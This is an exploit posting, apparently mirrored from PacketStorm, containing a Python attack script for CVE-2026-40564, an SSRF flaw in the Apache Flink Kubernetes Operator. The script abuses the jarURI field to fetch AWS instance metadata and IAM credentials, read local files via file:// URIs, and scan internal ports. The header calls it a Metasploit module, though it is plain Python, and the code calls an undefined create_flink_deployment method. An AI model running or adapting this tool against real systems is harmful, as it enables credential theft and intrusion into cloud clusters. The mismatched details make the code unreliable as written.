Share
## https://sploitus.com/exploit?id=PACKETSTORM:223525
==================================================================================================================================
    | # Title     : Apache Flink Kubernetes Operator 1.14.0 SSRF Exploitation Tool with Metadata Extraction                          |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://flink.apache.org/                                                                                        |
    ==================================================================================================================================
    
    [+] Summary    :  This is a Metasploit auxiliary module for CVE-2026-40564, a Server-Side Request Forgery (SSRF) vulnerability in the Apache Flink Kubernetes Operator
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import base64
    import json
    import sys
    import time
    import urllib.request
    import urllib.parse
    import ssl
    import re
    from typing import Optional, Dict, List, Tuple
    
    class FlinkOperatorSSRF:
        def __init__(self, api_server: str, token: str = None, namespace: str = "default", 
                     verify_ssl: bool = False, timeout: int = 30):
            self.api_server = api_server.rstrip('/')
            self.namespace = namespace
            self.timeout = timeout
            self.verify_ssl = verify_ssl
            self.headers = {
                'Content-Type': 'application/json'
            }
            
            if token:
                self.headers['Authorization'] = f'Bearer {token}'
    
            self.ctx = ssl.create_default_context()
            if not verify_ssl:
                self.ctx.check_hostname = False
                self.ctx.verify_mode = ssl.CERT_NONE
        
        def log(self, msg: str, level: str = "INFO"):
            colors = {
                "SUCCESS": "\033[92m[+]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "INFO": "\033[96m[*]\033[0m",
                "PROC": "\033[94m[@]\033[0m"
            }
            print(f"{colors.get(level, '[*]')} {msg}")
        
        def k8s_request(self, method: str, path: str, data: dict = None) -> Tuple[Optional[int], Optional[dict]]:
            """Make Kubernetes API request"""
            url = f"{self.api_server}{path}"
            req = urllib.request.Request(url, method=method, headers=self.headers)
            
            if data:
                req.add_header('Content-Type', 'application/json')
                req.data = json.dumps(data).encode('utf-8')
            
            try:
                with urllib.request.urlopen(req, context=self.ctx, timeout=self.timeout) as resp:
                    body = resp.read().decode('utf-8')
                    if body:
                        return resp.status, json.loads(body)
                    return resp.status, None
            except urllib.error.HTTPError as e:
                if e.code == 409:  # Conflict - resource may already exist
                    return e.code, None
                body = e.read().decode('utf-8') if e.fp else ''
                self.log(f"K8s API error: {e.code} - {body[:200]}", "WARNING")
                return e.code, None
            except Exception as e:
                self.log(f"Request failed: {e}", "ERROR")
                return None, None
        
        def find_operator_pod(self) -> Optional[str]:
            """Find Flink operator pod in the cluster"""
            self.log("Searching for Flink operator pod...", "PROC")
            
            status, pods = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods')
            
            if status == 200 and pods:
                for pod in pods.get('items', []):
                    name = pod.get('metadata', {}).get('name', '')
                    if 'flink-kubernetes-operator' in name.lower():
                        self.log(f"Found operator pod: {name}", "SUCCESS")
                        return name
            
            self.log("Could not find operator pod", "WARNING")
            return None
        
        def get_operator_logs(self, pod_name: str, tail_lines: int = 100) -> Optional[str]:
            """Fetch operator pod logs"""
            status, logs = self.k8s_request('GET', f'/api/v1/namespaces/{self.namespace}/pods/{pod_name}/log?tailLines={tail_lines}')
            
            if status == 200:
                return logs if isinstance(logs, str) else str(logs)
            
            return None
        
        def create_flink_session_job(self, name: str, jar_uri: str) -> bool:
            """Create malicious FlinkSessionJob"""
            manifest = {
                "apiVersion": "flink.apache.org/v1beta1",
                "kind": "FlinkSessionJob",
                "metadata": {
                    "name": name,
                    "namespace": self.namespace
                },
                "spec": {
                    "job": {
                        "jarURI": jar_uri,
                        "parallelism": 1,
                        "upgradeMode": "stateless"
                    },
                    "flinkConfiguration": {},
                    "jobManager": {},
                    "taskManager": {}
                }
            }
            
            status, _ = self.k8s_request(
                'POST',
                f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/flinksessionjobs',
                manifest
            )
            
            if status == 201:
                self.log(f"Created FlinkSessionJob: {name}", "SUCCESS")
                return True
            
            self.log(f"Failed to create FlinkSessionJob: HTTP {status}", "ERROR")
            return False
        
        def delete_resource(self, name: str, resource_type: str = 'flinksessionjob') -> bool:
            """Delete Kubernetes resource"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, _ = self.k8s_request('DELETE', path)
            
            if status in [200, 202, 204]:
                self.log(f"Deleted {resource_type}: {name}", "SUCCESS")
                return True
            
            return False
        
        def get_resource_status(self, name: str, resource_type: str = 'flinksessionjob') -> Optional[dict]:
            """Get resource status"""
            path = f'/apis/flink.apache.org/v1beta1/namespaces/{self.namespace}/{resource_type}s/{name}'
            status, data = self.k8s_request('GET', path)
            
            if status == 200:
                return data
            
            return None
        
        def check_ssrf(self, jar_uri: str, use_session_cluster: bool = True) -> bool:
            """Execute SSRF attack"""
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            resource_name = f"ssrf-{int(time.time())}"
            
            self.log(f"Creating SSRF resource: {resource_name}", "PROC")
            self.log(f"Target URL: {jar_uri}")
    
            if use_session_cluster:
                success = self.create_flink_session_job(resource_name, jar_uri)
            else:
                success = self.create_flink_deployment(resource_name, jar_uri)
            
            if not success:
                return False
            self.log("Waiting for operator reconciliation (15s)...", "PROC")
            time.sleep(15)
            status = self.get_resource_status(resource_name, resource_type)
            
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                self.log(f"Resource status: {status_text[:200]}...")
                error_keywords = [
                    'Failed to fetch',
                    'Connection refused',
                    'connect timed out',
                    'UnknownHostException',
                    'FileNotFoundException'
                ]
                
                for keyword in error_keywords:
                    if keyword in status_text:
                        self.log(f"SSRF attempt confirmed: {keyword}", "SUCCESS")
                        break
            operator_pod = self.find_operator_pod()
            if operator_pod:
                self.log("Fetching operator logs...", "PROC")
                logs = self.get_operator_logs(operator_pod, 200)
                
                if logs and jar_uri in logs:
                    self.log(f"SSRF CONFIRMED - operator fetched {jar_uri}", "SUCCESS")
    
                    if 'GET' in logs and jar_uri in logs:
                        self.log("HTTP GET request confirmed in logs", "SUCCESS")
                    ua_match = re.search(r'User-Agent: ([^\n]+)', logs)
                    if ua_match:
                        self.log(f"User-Agent: {ua_match.group(1)}")
            self.log("Cleaning up resources...", "PROC")
            self.delete_resource(resource_name, resource_type)
            
            return True
        
        def read_aws_metadata(self, use_session_cluster: bool = True) -> Optional[dict]:
            """Attempt to read AWS instance metadata"""
            self.log("Attempting to read AWS metadata via SSRF...", "PROC")
            
            metadata_urls = [
                "http://169.254.169.254/latest/meta-data/",
                "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "http://169.254.169.254/latest/user-data/",
                "http://169.254.169.254/latest/dynamic/instance-identity/document"
            ]
            results = {}
            for url in metadata_urls:
                self.log(f"Trying: {url}")
                resource_name = f"ssrf-metadata-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(10)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
    
                    if 'iam' in status_text.lower() or 'security-credentials' in status_text.lower():
                        self.log(f"Metadata found at {url}!", "SUCCESS")
                        roles = re.findall(r'([a-zA-Z0-9\-_]+)', status_text)
                        results[url] = status_text
                        
                        for role in roles:
                            if len(role) > 3 and not role.isdigit():
                                self.log(f"  Role: {role}")
                self.delete_resource(resource_name, resource_type)
                time.sleep(1)
            return results if results else None
        def read_local_file(self, filepath: str, use_session_cluster: bool = True) -> Optional[str]:
            """Attempt to read local file via file:// scheme"""
            self.log(f"Attempting to read file: {filepath}", "PROC")
            jar_uri = f"file://{filepath}"
            resource_name = f"ssrf-file-{int(time.time())}"
            resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
            if use_session_cluster:
                self.create_flink_session_job(resource_name, jar_uri)
            else:
                self.create_flink_deployment(resource_name, jar_uri)
            time.sleep(10)
            status = self.get_resource_status(resource_name, resource_type)
            content = None
            if status and status.get('status'):
                status_text = json.dumps(status['status'])
                if 'file://' in status_text:
                    file_content = re.search(r'Message: (.+?)(?:\"|$)', status_text)
                    if file_content:
                        content = file_content.group(1)
                        self.log(f"File content extracted:", "SUCCESS")
                        print("\n" + "=" * 65)
                        print(content)
                        print("=" * 65)
            
            self.delete_resource(resource_name, resource_type)
            return content
        
        def internal_port_scan(self, host: str, ports: List[int], use_session_cluster: bool = True) -> List[int]:
            """Scan internal ports via SSRF"""
            self.log(f"Scanning {host} ports: {ports}", "PROC")
            
            open_ports = []
            
            for port in ports:
                url = f"http://{host}:{port}/"
                self.log(f"Testing port {port}...")
                
                resource_name = f"ssrf-scan-{port}-{int(time.time())}"
                resource_type = 'flinksessionjob' if use_session_cluster else 'flinkdeployment'
                if use_session_cluster:
                    self.create_flink_session_job(resource_name, url)
                else:
                    self.create_flink_deployment(resource_name, url)
                time.sleep(5)
                status = self.get_resource_status(resource_name, resource_type)
                if status and status.get('status'):
                    status_text = json.dumps(status['status'])
                    
                    if 'Connection refused' in status_text:
                        self.log(f"Port {port}: closed")
                    elif 'connect timed out' in status_text:
                        self.log(f"Port {port}: timeout (maybe filtered)")
                    elif 'Failed to fetch' not in status_text:
                        self.log(f"Port {port}: OPEN or responding", "SUCCESS")
                        open_ports.append(port)
                
                self.delete_resource(resource_name, resource_type)
            return open_ports
        def run(self, ssrf_url: str = None, use_session_cluster: bool = True, 
                read_metadata: bool = False, read_file: str = None,
                scan_host: str = None, scan_ports: List[int] = None) -> bool:
            """Main exploit routine"""
            self.log(f"Target: {self.api_server}")
            self.log(f"Namespace: {self.namespace}")
            status, _ = self.k8s_request('GET', '/version')
            if status != 200:
                self.log("Cannot connect to Kubernetes API", "ERROR")
                return False
            self.log("Connected to Kubernetes API", "SUCCESS")
            if read_metadata:
                metadata = self.read_aws_metadata(use_session_cluster)
                if metadata:
                    self.log("AWS metadata extraction complete", "SUCCESS")
                    return True
            elif read_file:
                content = self.read_local_file(read_file, use_session_cluster)
                if content:
                    return True
            elif scan_host and scan_ports:
                open_ports = self.internal_port_scan(scan_host, scan_ports, use_session_cluster)
                if open_ports:
                    self.log(f"Open ports: {open_ports}", "SUCCESS")
                return bool(open_ports)
            elif ssrf_url:
                return self.check_ssrf(ssrf_url, use_session_cluster)
            else:
                self.log("No action specified", "ERROR")
                return False
    def main():
        parser = argparse.ArgumentParser(
            description="CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF"
        )
        parser.add_argument("--api-server", required=True, help="Kubernetes API server URL")
        parser.add_argument("--token", help="Bearer token for authentication")
        parser.add_argument("--namespace", default="default", help="Kubernetes namespace")
        parser.add_argument("--insecure", action="store_true", help="Skip SSL verification")
        parser.add_argument("--ssrf-url", help="URL to fetch via SSRF")
        parser.add_argument("--read-aws-metadata", action="store_true", help="Read AWS instance metadata")
        parser.add_argument("--read-file", help="Read local file via file:// scheme")
        parser.add_argument("--scan-host", help="Host to scan for open ports")
        parser.add_argument("--scan-ports", help="Comma-separated ports to scan (e.g., 80,443,8080)")
        parser.add_argument("--use-deployment", action="store_true", help="Use FlinkDeployment instead of FlinkSessionJob")
        parser.add_argument("--timeout", type=int, default=30, help="Request timeout")
        
        args = parser.parse_args()
        
        print("""
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘  CVE-2026-40564 - Apache Flink Kubernetes Operator SSRF        โ•‘
    โ•‘  Server-Side Request Forgery via jarURI                        โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """)
        
        exploit = FlinkOperatorSSRF(
            api_server=args.api_server,
            token=args.token,
            namespace=args.namespace,
            verify_ssl=not args.insecure,
            timeout=args.timeout
        )
        
        scan_ports = None
        if args.scan_ports:
            scan_ports = [int(p.strip()) for p in args.scan_ports.split(',')]
        
        success = exploit.run(
            ssrf_url=args.ssrf_url,
            use_session_cluster=not args.use_deployment,
            read_metadata=args.read_aws_metadata,
            read_file=args.read_file,
            scan_host=args.scan_host,
            scan_ports=scan_ports
        )
        
        sys.exit(0 if success else 1)
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================